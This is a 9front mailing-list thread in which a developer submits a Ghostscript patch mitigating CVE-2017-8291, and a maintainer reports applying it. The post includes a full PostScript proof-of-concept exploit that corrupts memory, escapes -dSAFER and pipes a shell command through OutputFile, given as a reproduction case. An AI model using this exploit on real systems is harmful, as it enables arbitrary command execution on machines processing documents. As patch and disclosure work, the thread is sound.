Re: [9front] ghostscript: Mitigations against CVE-2017-8291

9front - general discussion about 9front
 help / color / mirror / Atom feed

* Re: [9front] ghostscript: Mitigations against CVE-2017-8291
@ 2019-06-21 16:57 cinap_lenrek
  0 siblings, 0 replies; 2+ messages in thread
From: cinap_lenrek @ 2019-06-21 16:57 UTC (permalink / raw)
  To: 9front

applied, thank you!

--
cinap


^ permalink raw reply	[flat|nested] 2+ messages in thread

* [9front] ghostscript: Mitigations against CVE-2017-8291
@ 2019-06-21 10:53 Jacob Moody
  0 siblings, 0 replies; 2+ messages in thread
From: Jacob Moody @ 2019-06-21 10:53 UTC (permalink / raw)
  To: 9front

All,

Grabbed the upstream changes for the mitigation against CVE-2017-8291.
The proof of concepts I found online do not seem to do anything
interesting besides hang gs indefinitely or suicide.

To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

.


Patch:
diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c
--- a/sys/src/cmd/gs/src/zfrsd.c    Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zfrsd.c    Fri Jun 21 05:34:42 2019 -0500
@@ -47,13 +47,19 @@
     ref *pFilter;
     ref *pDecodeParms;
     int Intent;
-    bool AsyncRead;
+    bool AsyncRead = false;
     ref empty_array, filter1_array, parms1_array;
     uint i;
-    int code;
+    int code = 0;
+
+    if (ref_stack_count(&o_stack) < 1)
+        return_error(e_stackunderflow);
+    if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+         return_error(e_typecheck);

     make_empty_array(&empty_array, a_readonly);
-    if (dict_find_string(op, "Filter", &pFilter) > 0) {
+    if (r_has_type(op, t_dictionary)
+        && dict_find_string(op, "Filter", &pFilter) > 0) {
     if (!r_is_array(pFilter)) {
         if (!r_has_type(pFilter, t_name))
         return_error(e_typecheck);
@@ -92,10 +98,12 @@
         return_error(e_typecheck);
     }
     }
-    if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
-    (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
-    )
-    return code;
+    if (r_has_type(op, t_dictionary))
+        code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+    if (r_has_type(op, t_dictionary))
+        if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+            return code;
     push(1);
     op[-1] = *pFilter;
     if (pDecodeParms)
diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c
--- a/sys/src/cmd/gs/src/zmisc3.c    Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zmisc3.c    Fri Jun 21 05:34:42 2019 -0500
@@ -55,6 +55,12 @@
     ref2_t stack[MAX_DEPTH + 1];
     ref2_t *top = stack;

+    if (ref_stack_count(&o_stack) < 2)
+        return_error(e_stackunderflow);
+    if (!r_is_array(op - 1) || !r_is_array(op)) {
+        return_error(e_typecheck);
+    }
+
     make_array(&stack[0].proc1, 0, 1, op - 1);
     make_array(&stack[0].proc2, 0, 1, op);
     for (;;) {



Thanks,

moody


^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2019-06-21 16:57 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2019-06-21 16:57 [9front] ghostscript: Mitigations against CVE-2017-8291 cinap_lenrek
  -- strict thread matches above, loose matches on Subject: below --
2019-06-21 10:53 Jacob Moody

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).